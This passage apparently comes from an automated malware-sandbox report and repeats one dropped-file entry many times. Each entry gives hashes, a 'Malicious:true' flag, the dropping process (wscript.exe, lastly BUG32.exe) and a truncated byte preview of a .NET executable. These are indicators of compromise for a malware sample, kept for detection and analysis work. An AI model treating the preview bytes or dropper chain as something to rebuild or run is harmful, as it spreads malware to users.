                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Users\user\Desktop\BUG32.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
